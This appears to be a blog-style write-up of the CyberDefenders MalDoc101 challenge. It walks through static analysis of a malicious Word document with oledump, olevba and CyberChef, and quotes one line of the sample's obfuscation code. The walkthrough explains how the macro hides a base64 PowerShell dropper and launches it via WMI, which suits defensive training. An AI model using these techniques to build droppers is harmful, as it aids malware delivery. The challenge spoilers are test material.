Try   HackMD

MalDoc101 | Cyberdefenders

Hello, this is my approach for solving cyberdefenders challenge for maldoc101 which can be found here

Solving the challenge

We'll follow the questions for us to solve it.

Disclaimer:
Please it's better to first 
solve the challenge first before solving it since
it will have some spoliers.

Challenge details

It's common for threat actors to utilize living off the land 
(LOTL) techniques, such as the execution of PowerShell to 
further their attacks and transition from macro code. This 
challenge is intended to show how you can often times perform 
quick analysis to extract important IOCs. 
The focus of this exercise is on static techniques for analysis.

Suggested Tools:

REMnux Virtual Machine (remnux.org)
Terminal/Command prompt w/ Python installed
Oledump
Text editor

For me I really didn't quite use REMnux instead I used Flare-Vm since most of the tools to be used in this challenge are also in Flare-vm.

#1 Multiple streams contain macros in this document. Provide the number of highest one.

Let's use Oledump which is a tool in OLEtools and comes pre-installed in Flare-vm.

 oledump sample.bin > sample.txt

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

open sample.txt in sublime:

we see there are 3 streams with macros i.e there are appended with M or m, it's important to note that streams with M (uppercase)are used to show macro with a code while m(lowercase) are used to show macro with a user denoted form.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

We enter the stream with the macros and we get our answer.

#2 What event is used to begin the execution of the macros?

Here we use a tool called olevba which is used for extracting and analyzing VBA macro source code for MS Office documents.

olevba --deobf sample.bin > vba.txt

NOTE: we use deobf for deobfuscation

we open vba.txt in sublime text and try to see the source code.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

we see in autoexec function is the beginning of the macro code, hence we see what the macro does in the keyword and that is the event.

#3 What malware family was this maldoc attempting to drop?
This was pretty easy , we get the md5 for the file:

md5sum.exe sample.bin

upload the md5 hash to virustotal and right off the bat we see many other similar files and their family which is pretty common.

#4 What stream is responsible for the storage of the base64-encoded string?

we again view the vba.txt file in sublime, we see a large string of base 64:

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

note in the vba form string in it gives us where the stream is, we now view in the file we saved the output of oledump and we get our answer.
Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

#5 This document contains a user-form. Provide the name?

Remember earlier when I said that m in lowercase in oledump is used to show the user form, well there goes our answer, LOL!
Refer to this image:

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

#6 This document contains an obfuscated base64 encoded string; what value is used to pad (or obfuscate) this string?

The fun begins here now!

oledump.py -s 15 --vbadecompresscorrupt sample.bin

NOTE: we use vbadecompresscorrupt to get quality results of the macros of the sample bin.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

scrolling down the code, I saw that it has a split function:

feaxgeip = Split(geutyoeytiestheug, "2342772g3&*gs7712ffvs626fq")

searching for the value of 'geutyoeytiestheug' from the code above shows that it has the same value as haothkoebtheil. That must be the obfuscated base64 encoded string.

#7 What is the program executed by the base64 encoded string?

since we observed that the stream which has base 64 string is stream 34, now we can dump the contents of the stream as:

oledump.py -s 34 -d sample.bin
-d - used to perform dump function.

we can copy the output to a text file for better viewing:

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

we can clean out the junk in the code that is:

in the beginning of the code:
 ☻¶;1��     ↑   �:  ►   ♦     ☻     �‼  �♫  ♣  �Page1O3G♣  �Page2O3G    �: �
 
 and the end of the code:
 ♦  �Tab3♦  �Tab4
     ☻↑ 5   ♠  ��    ☻  Tahoma  ♥   ♥

we use cyberchef to clean the code now:
good thing is cyberchef also comes pre-installed in Flare-vm so that's to our advantage.

upon launching cyberchef, we can Find/Replace function
we replace the string used to pad the base64 and use simple strings as shown in the image below:

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

we See it is a powershell script and hence we get our answer.

#8 What WMI class is used to create the process to launch the trojan?

In the output in cyberchef we copy the content and decode from base 64 as follows:

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

in cyberchef decode it, we can use from base64 and use beautify code to get a cleaner output and also use remove null bytes, so it will be:

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

so the cleaner code will be:

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

we see in if statement the wmiclass being defined, our answer is there.

#9 Multiple domains were contacted to download a trojan. Provide first FQDN as per the provided hint.

in our clean code we see various domains being called, but the question asks the first domain so we copy the fist domain we see and we get our answer.

That's all for that interesting maldoc challenge!!